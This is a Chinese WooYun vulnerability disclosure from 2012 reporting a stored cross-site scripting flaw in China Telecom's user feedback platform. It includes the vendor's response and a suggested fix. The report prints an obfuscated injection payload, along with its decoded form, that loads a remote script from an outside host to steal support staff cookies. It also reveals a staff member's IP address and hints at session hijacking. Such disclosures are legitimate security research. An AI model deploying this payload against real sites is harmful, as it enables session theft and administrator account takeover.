当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05230

漏洞标题:中国电信某平台储存型跨站

相关厂商:中国电信

漏洞作者: pestu

提交时间:2012-03-13 14:18

修复时间:2012-04-27 14:18

公开时间:2012-04-27 14:18

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-03-13: 细节已通知厂商并且等待厂商处理中
2012-03-14: 厂商已经确认,细节仅向厂商公开
2012-03-24: 细节向核心白帽子及相关领域专家公开
2012-04-03: 细节向普通白帽子公开
2012-04-13: 细节向实习白帽子公开
2012-04-27: 细节向公众公开

简要描述:

中国电信某平台对客户提交的留言没有进行严格验证,输出到客户端时也没有进行转义导致xss漏洞。通过xss可获取管理员cookie,管理平台地址,管理员的IP地址及所使用的浏览器等信息,进而以管理员身份登录管理平台。

详细说明:

中国电信有一个中国电信互联网产品用户问题反馈平台,通过该平台用户可反馈中国电信各互联网产品的bug。如图:


由于该平台对对客户提交的留言没有进行严格验证,输出到客户端时也没有进行转义导致xss漏洞。这里选取189邮箱做测试,首先登录189邮箱,点击右上角的反馈:


打开反馈页面:


当然这里直接输入javascript脚本是不可以的,网页中有一段javascript对输入的反馈留言做了判断,由于是客户端的判断,所以很容易绕过,这里就不多说罢。
提交以下反馈至服务器

<img src='http://www.baidu.com/img/baidu_logo.gif' onload='var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,115,116,117,110,111,116,101,46,115,105,110,97,97,112,112,46,99,111,109,47,120,115,115,46,106,115,63)++ new Date().getTime(); ;document.body.appendChild(s);'/>


以上代码类似于

<script type="text/javascript">
var s=document.createElement("script");
s.type="text/javascript";
s.src="http://stunote.sinaapp.com/xss.js?" + new Date().getTime();
document.body.appendChild(s);
</script>


这里有个小技巧,js文件名是xss.js?1331394206172这种形式,主要是为了方便调试。
这样浏览器就会以为每次引用的js文件都是不同的,当然我们的xss.js对后面的动态数并不进行处理.这次每次读取到的都是最新的js文件,js文件修改后效果可以马上看到,非常方便.
xss.js可以是如下内容:

alert(document.cookie);
alert(document.domain);


弹出cookie和当前的域名


域名:


当然我们也可以换成获取cookie和其他信息的js脚本。
当客服看到我们的留言时就会触发,获取到的客服cookie如下:


从上图可以看到客服IP为 59.36.102.177 经查询该IP所在地为中国广东省广州市
看来客服是在广州上网的,浏览器为IE7.
有了cookie就好办了,你懂的。

漏洞证明:


这里只对189邮箱的反馈平台作了测试,相信其他产品的反馈也存在类拟的问题。

修复方案:

对客户输入在服务器端进行过滤或对客户的留言输出时进行htmlencode

版权声明:转载请注明来源 pestu@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-03-14 16:38

厂商回复:

CNVD确认漏洞情况,将由CNCERT直接协调中国电信集团公司处置。鉴于pestu同学在上回已经提交了两个相似系统的XSS漏洞,该漏洞仅追加rank 5。
同时该漏洞也说明相关方有漏洞处置方面力度仍有欠缺,CNCERT也将继续监督。

最新状态:

暂无